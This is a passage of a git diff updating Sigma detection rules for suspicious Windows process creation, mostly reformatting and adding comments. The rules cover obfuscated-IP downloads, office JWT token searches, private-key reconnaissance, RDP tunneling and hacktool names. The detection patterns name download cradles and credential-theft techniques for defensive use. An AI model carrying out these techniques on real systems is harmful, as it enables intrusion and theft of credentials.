\thor\thor64.exe - - Product: InstallShield (R) - - Description: InstallShield (R) Setup Engine - - Company: InstallShield Software Corporation + - ParentProcessName: + - C:\Windows\System32\Dism.exe + - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) + - ParentProcessName|endswith: + - \WebEx\WebexHost.exe # Spawns a shortened version of the CLI and Image processes + - \thor\thor64.exe + - Product: InstallShield (R) + - Description: InstallShield (R) Setup Engine + - Company: InstallShield Software Corporation filter_installers: - - NewProcessName|contains|all: - - \AppData\ - - \Temp\ - - NewProcessName|endswith: - - ~1\unzip.exe - - ~1\7zG.exe + - NewProcessName|contains|all: + - \AppData\ + - \Temp\ + - NewProcessName|endswith: + - ~1\unzip.exe + - ~1\7zG.exe condition: process_creation and (selection and not 1 of filter*) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case Investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml index 8177e4a11..26ab9abbc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml @@ -1,11 +1,10 @@ title: Use NTFS Short Name in Command Line id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 related: - - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b - type: similar + - id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b + type: similar status: test -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid command-line detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ~1.exe - ~1.bat - ~1.msi @@ -44,13 +43,12 @@ detection: - ~2.js - ~2.hta filter: - - ParentProcessName|endswith: - - \WebEx\WebexHost.exe - - \thor\thor64.exe - - CommandLine|contains: C:\xampp\vcredist\VCREDI~1.EXE + - ParentProcessName|endswith: + - \WebEx\WebexHost.exe + - \thor\thor64.exe + - CommandLine|contains: C:\xampp\vcredist\VCREDI~1.EXE condition: process_creation and (selection and not filter) falsepositives: - - Applications could use this notation occasionally which might generate some - false positives. In that case Investigate the parent and child process. + - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml index 0a970c96c..74c071900 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml @@ -1,11 +1,10 @@ title: Use NTFS Short Name in Image id: 3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b related: - - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 - type: similar + - id: dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 + type: similar status: experimental -description: Detect use of the Windows 8.3 short name. Which could be used as a method - to avoid Image based detection +description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection references: - https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: - ~1.bat - ~1.dll - ~1.exe @@ -52,11 +51,10 @@ detection: filter_optional_thor: ParentProcessName|endswith: \thor\thor64.exe filter_optional_winzip: - NewProcessName: C:\PROGRA~1\WinZip\WZPREL~1.EXE + NewProcessName: C:\PROGRA~1\WinZip\WZPREL~1.EXE filter_optional_vcred: - NewProcessName|endswith: \VCREDI~1.EXE - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + NewProcessName|endswith: \VCREDI~1.EXE + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Software Installers level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml b/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml index ded20c553..219298ef1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml @@ -1,8 +1,7 @@ title: Obfuscated IP Download Activity id: cb5a2333-56cf-4562-8fcb-22ba1bca728d status: test -description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) - in an URL combined with a download command +description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection_command: - CommandLine|contains: + CommandLine|contains: - Invoke-WebRequest - 'iwr ' - 'wget ' @@ -28,26 +27,31 @@ detection: - DownloadFile - DownloadString selection_ip_1: - CommandLine|contains: + CommandLine|contains: - ' 0x' - //0x - .0x - .00x selection_ip_2: - CommandLine|contains|all: + CommandLine|contains|all: - http://% - '%2e' selection_ip_3: - - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} - - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} - - CommandLine|re: https?://0[0-9]{3,11} - - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} - - CommandLine|re: https?://0[0-9]{1,11} - - CommandLine|re: ' [0-7]{7,13}' + # http://81.4.31754 + - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} + # http://81.293898 + - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} + # http://1359248394 + - CommandLine|re: https?://0[0-9]{3,11} + # http://0121.04.0174.012 + - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} + # http://012101076012 + - CommandLine|re: https?://0[0-9]{1,11} + # For octal format + - CommandLine|re: ' [0-7]{7,13}' filter_main_valid_ip: - CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} - condition: process_creation and (selection_command and 1 of selection_ip_* and - not 1 of filter_main_*) + CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} + condition: process_creation and (selection_command and 1 of selection_ip_* and not 1 of filter_main_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml b/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml index 46c3d6d39..0e97a792c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml @@ -1,8 +1,7 @@ title: Obfuscated IP Via CLI id: 56d19cb4-6414-4769-9644-1ed35ffbb148 status: experimental -description: Detects usage of an encoded/obfuscated version of an IP address (hex, - octal, etc.) via command line +description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line references: - https://h.43z.one/ipconverter/ - https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 @@ -19,30 +18,35 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \ping.exe - \arp.exe selection_ip_1: - CommandLine|contains: + CommandLine|contains: - ' 0x' - //0x - .0x - .00x selection_ip_2: - CommandLine|contains|all: + CommandLine|contains|all: - http://% - '%2e' selection_ip_3: - - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} - - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} - - CommandLine|re: https?://0[0-9]{3,11} - - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} - - CommandLine|re: https?://0[0-9]{1,11} - - CommandLine|re: ' [0-7]{7,13}' + # http://81.4.31754 + - CommandLine|re: https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} + # http://81.293898 + - CommandLine|re: https?://[0-9]{1,3}\.0[0-9]{3,7} + # http://1359248394 + - CommandLine|re: https?://0[0-9]{3,11} + # http://0121.04.0174.012 + - CommandLine|re: https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} + # http://012101076012 + - CommandLine|re: https?://0[0-9]{1,11} + # For octal format + - CommandLine|re: ' [0-7]{7,13}' filter_main_valid_ip: - CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} - condition: process_creation and (selection_img and 1 of selection_ip_* and not - 1 of filter_main_*) + CommandLine|re: https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} + condition: process_creation and (selection_img and 1 of selection_ip_* and not 1 of filter_main_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_office_token_search.yml b/sigma/builtin/process_creation/proc_creation_win_susp_office_token_search.yml index 64a4a0563..1fa38856d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_office_token_search.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_office_token_search.yml @@ -1,9 +1,7 @@ title: Suspicious Office Token Search Via CLI id: 6d3a3952-6530-44a3-8554-cf17c116c615 status: test -description: Detects possible search for office tokens via CLI by looking for the - string "eyJ0eX". This string is used as an anchor to look for the start of the - JWT token used by office and similar apps. +description: Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps. references: - https://mrd0x.com/stealing-tokens-from-office-applications/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +17,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: - - eyJ0eXAiOi + CommandLine|contains: + - eyJ0eXAiOi # {"typ": - ' eyJ0eX' - ' "eyJ0eX"' - - ' ''eyJ0eX''' + - " 'eyJ0eX'" condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_parents.yml b/sigma/builtin/process_creation/proc_creation_win_susp_parents.yml index 0df0cd25a..0bcedb2cf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_parents.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_parents.yml @@ -1,8 +1,7 @@ title: Suspicious Process Parents id: cbec226f-63d9-4eca-9f52-dfb6652f24df status: test -description: Detects suspicious parent processes that should not have any children - or should only have a single possible child program +description: Detects suspicious parent processes that should not have any children or should only have a single possible child program references: - https://twitter.com/x86matthew/status/1505476263464607744?s=12 - https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b @@ -28,21 +27,21 @@ detection: ParentProcessName|endswith: - \csrss.exe - \certutil.exe + # - '\schtasks.exe' - \eventvwr.exe - \calc.exe - \notepad.exe filter_special: - NewProcessName|endswith: + NewProcessName|endswith: - \WerFault.exe - \wermgr.exe - - \conhost.exe - - \mmc.exe - - \win32calc.exe + - \conhost.exe # csrss.exe, certutil.exe + - \mmc.exe # eventvwr.exe + - \win32calc.exe # calc.exe - \notepad.exe filter_null: - NewProcessName: null - condition: process_creation and (selection or ( selection_special and not 1 of - filter_* )) + NewProcessName: + condition: process_creation and (selection or ( selection_special and not 1 of filter_* )) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml b/sigma/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml index 8879ad079..9e07c635e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml @@ -1,11 +1,10 @@ title: Privilege Escalation via Named Pipe Impersonation id: 9bd04a79-dabe-4f1f-a5ff-92430265c96b related: - - id: f35c5d71-b489-4e22-a115-f003df287317 - type: derived + - id: f35c5d71-b489-4e22-a115-f003df287317 + type: derived status: test -description: Detects a remote file copy attempt to a hidden network share. This may - indicate lateral movement or data staging activity. +description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. references: - https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html author: Tim Rauch @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_name: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - echo - '>' - \\\\.\\pipe\\ diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml b/sigma/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml index d5178f5b6..11bc7eb01 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_private_keys_recon.yml @@ -1,8 +1,7 @@ title: Private Keys Reconnaissance Via CommandLine Tools id: 213d6a77-3d55-4ce8-ba74-fcfef741974e status: test -description: Adversaries may search for private key certificate files on compromised - systems for insecurely stored credential +description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -19,24 +18,24 @@ detection: EventID: 4688 Channel: Security selection_cmd_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cmd_cli: - CommandLine|contains: 'dir ' + CommandLine|contains: 'dir ' selection_pwsh_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: 'Get-ChildItem ' + CommandLine|contains: 'Get-ChildItem ' selection_findstr: - - NewProcessName|endswith: \findstr.exe - - OriginalFileName: FINDSTR.EXE + - NewProcessName|endswith: \findstr.exe + - OriginalFileName: FINDSTR.EXE selection_ext: - CommandLine|contains: + CommandLine|contains: - .key - .pgp - .gpg @@ -47,8 +46,7 @@ detection: - .cer - .p7b - .asc - condition: process_creation and (selection_ext and (all of selection_cmd_* or - all of selection_pwsh_* or selection_findstr)) + condition: process_creation and (selection_ext and (all of selection_cmd_* or all of selection_pwsh_* or selection_findstr)) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml index 687c43519..8ef130a66 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml @@ -1,8 +1,7 @@ title: Suspicious RunAs-Like Flag Combination id: 50d66fb0-03f8-4da0-8add-84e77d12a020 status: test -description: Detects suspicious command line flags that let the user set a target - user and command as e.g. seen in PsExec-like tools +description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools references: - https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html author: Florian Roth (Nextron Systems) @@ -17,16 +16,16 @@ detection: EventID: 4688 Channel: Security selection_user: - CommandLine|contains: + CommandLine|contains: - ' -u system ' - ' --user system ' - ' -u NT' - ' -u "NT' - - ' -u ''NT' + - " -u 'NT" - ' --system ' - ' -u administrator ' selection_command: - CommandLine|contains: + CommandLine|contains: - ' -c cmd' - ' -c "cmd' - ' -c powershell' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml index 13b2175da..e2c4f5854 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_proc_wrong_parent.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \svchost.exe - \taskhost.exe - \lsm.exe @@ -32,20 +32,20 @@ detection: - \wininit.exe - \winlogon.exe filter_sys: - - ParentProcessName|endswith: - - \SavService.exe - - \ngen.exe - - ParentProcessName|contains: - - \System32\ - - \SysWOW64\ + - ParentProcessName|endswith: + - \SavService.exe + - \ngen.exe + - ParentProcessName|contains: + - \System32\ + - \SysWOW64\ filter_msmpeng: ParentProcessName|contains: - \Windows Defender\ - \Microsoft Security Client\ ParentProcessName|endswith: \MsMpEng.exe filter_null: - - ParentProcessName: null - - ParentProcessName: '-' + - ParentProcessName: + - ParentProcessName: '-' condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Some security products seem to spawn these diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_progname.yml b/sigma/builtin/process_creation/proc_creation_win_susp_progname.yml index 251e0c89a..f6eaefcde 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_progname.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_progname.yml @@ -1,8 +1,7 @@ title: Suspicious Program Names id: efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6 status: test -description: Detects suspicious patterns in program names or folders that are often - found in malicious samples or hacktools +description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: Florian Roth (Nextron Systems) @@ -19,21 +18,21 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|contains: - - \CVE-202 - - \CVE202 - - NewProcessName|endswith: - - \poc.exe - - \artifact.exe - - \artifact64.exe - - \artifact_protected.exe - - \artifact32.exe - - \artifact32big.exe - - obfuscated.exe - - obfusc.exe - - \meterpreter + - NewProcessName|contains: + - \CVE-202 # Update this when we reach the year 2100 + - \CVE202 # Update this when we reach the year 2100 + - NewProcessName|endswith: + - \poc.exe + - \artifact.exe + - \artifact64.exe + - \artifact_protected.exe + - \artifact32.exe + - \artifact32big.exe + - obfuscated.exe + - obfusc.exe + - \meterpreter selection_commandline: - CommandLine|contains: + CommandLine|contains: - inject.ps1 - Invoke-CVE - pupy.ps1 diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_recon.yml b/sigma/builtin/process_creation/proc_creation_win_susp_recon.yml index 6aac456cc..9240f44fd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_recon.yml @@ -1,11 +1,10 @@ title: Recon Information for Export with Command Prompt id: aa2efee7-34dd-446e-8a37-40790a66efd7 related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: similar + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: similar status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md author: frack113 @@ -22,15 +21,15 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|endswith: - - \tree.com - - \WMIC.exe - - \doskey.exe - - \sc.exe - - OriginalFileName: - - wmic.exe - - DOSKEY.EXE - - sc.exe + - NewProcessName|endswith: + - \tree.com + - \WMIC.exe + - \doskey.exe + - \sc.exe + - OriginalFileName: + - wmic.exe + - DOSKEY.EXE + - sc.exe selection_redirect: ParentCommandLine|contains: - ' > %TEMP%\' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml b/sigma/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml index 973c89ec6..30867cd9b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml @@ -1,11 +1,10 @@ title: Suspicious Process Execution From Fake Recycle.Bin Folder id: 5ce0f04e-3efc-42af-839d-5b3a543b76c0 related: - - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca - type: derived + - id: cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca + type: derived status: experimental -description: Detects process execution from a fake recycle bin folder, often used - to avoid security solution. +description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. references: - https://www.mandiant.com/resources/blog/infected-usb-steal-secrets - https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ @@ -23,7 +22,8 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: + NewProcessName|contains: + # e.g. C:\$RECYCLER.BIN - RECYCLERS.BIN\ - RECYCLER.BIN\ condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml b/sigma/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml index 12b1fa942..1aceffb5d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml @@ -1,8 +1,7 @@ title: Suspicious Redirection to Local Admin Share id: ab9e3b40-0c85-4ba1-aede-455d226fd124 status: test -description: Detects a suspicious output redirection to the local admins share, this - technique is often found in malicious scripts or hacktool stagers +description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers references: - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html @@ -20,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_redirect: - CommandLine|contains: '>' + CommandLine|contains: '>' selection_share: - CommandLine|contains: + CommandLine|contains: - \\\\127.0.0.1\\admin$\\ - \\\\localhost\\admin$\\ condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml b/sigma/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml index 21916a907..331d6dad5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml @@ -1,9 +1,7 @@ title: Potential Remote Desktop Tunneling id: 8a3038e8-9c9d-46f8-b184-66234a160f6f status: test -description: Detects potential use of an SSH utility to establish RDP over a reverse - SSH Tunnel. This can be used by attackers to enable routing of network packets - that would otherwise not reach their intended destination. +description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. references: - https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html author: Tim Rauch @@ -19,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: :3389 + CommandLine|contains: :3389 # RDP port and usual SSH tunneling related switches in command line selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -L ' - ' -P ' - ' -R ' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml b/sigma/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml index 2313e0ad7..202ee9008 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_right_to_left_override.yml @@ -1,12 +1,9 @@ title: Potential Defense Evasion Via Right-to-Left Override id: ad691d92-15f2-4181-9aa4-723c74f9ddc3 status: test -description: 'Detects the presence of the "u202+E" character, which causes a terminal, - browser, or operating system to render text in a right-to-left sequence. - +description: | + Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques. - - ' references: - https://redcanary.com/blog/right-to-left-override/ - https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method @@ -24,10 +21,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: "\u202E" + CommandLine|contains: ‮ condition: process_creation and selection falsepositives: - - Commandlines that contains scriptures such as arabic or hebrew might make use - of this character + - Commandlines that contains scriptures such as arabic or hebrew might make use of this character level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml b/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml index e091c779a..bfad4f82e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml @@ -1,8 +1,7 @@ title: Script Interpreter Execution From Suspicious Folder id: 1228c958-e64e-4e71-92ad-7d429f4138ba status: test -description: Detects a suspicious script execution in temporary folders or folders - accessible by environment variables +description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables references: - https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military @@ -21,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_proc_image: - NewProcessName|endswith: + NewProcessName|endswith: - \cscript.exe - \mshta.exe - \wscript.exe selection_proc_flags: - CommandLine|contains: + CommandLine|contains: - ' -ep bypass ' - ' -ExecutionPolicy bypass ' - ' -w hidden ' @@ -39,7 +38,7 @@ detection: - mshta.exe - wscript.exe selection_folders_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - \AppData\Local\Temp @@ -47,15 +46,15 @@ detection: - \Temporary Internet - \Windows\Temp selection_folders_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ condition: process_creation and (1 of selection_proc_* and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml b/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml index 6912bd8a9..053384fd5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_script_exec_from_temp.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - \Windows\Temp - \Temporary Internet - \AppData\Local\Temp @@ -26,19 +26,19 @@ detection: - '%TEMP%' - '%TMP%' - '%LocalAppData%\Temp' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \mshta.exe - \wscript.exe - \cscript.exe filter: - CommandLine|contains: + CommandLine|contains: - ' >' - Out-File - ConvertTo-Json - - -WindowStyle hidden -Verb runAs - - \Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\ + - -WindowStyle hidden -Verb runAs # VSCode behaviour if file cannot be written as current user + - \Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\ # EC2 AWS condition: process_creation and (selection and not filter) falsepositives: - Administrative scripts diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_service_creation.yml b/sigma/builtin/process_creation/proc_creation_win_susp_service_creation.yml index e0f32afc7..c720babf5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_service_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_service_creation.yml @@ -1,11 +1,10 @@ title: Suspicious New Service Creation id: 17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8 related: - - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab - type: derived + - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab + type: derived status: test -description: Detects creation of a new service via "sc" command or the powershell - "new-service" cmdlet with suspicious binary paths +description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -24,16 +23,17 @@ detection: EventID: 4688 Channel: Security selection_sc: - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath= - NewProcessName|endswith: \sc.exe + NewProcessName|endswith: \sc.exe selection_posh: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName susp_binpath: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious commands or binaries - powershell - mshta - wscript @@ -45,6 +45,7 @@ detection: - cmd.exe /k - cmd.exe /r - rundll32 + # Add more suspicious paths - C:\Users\Public - \Downloads\ - \Desktop\ diff --git 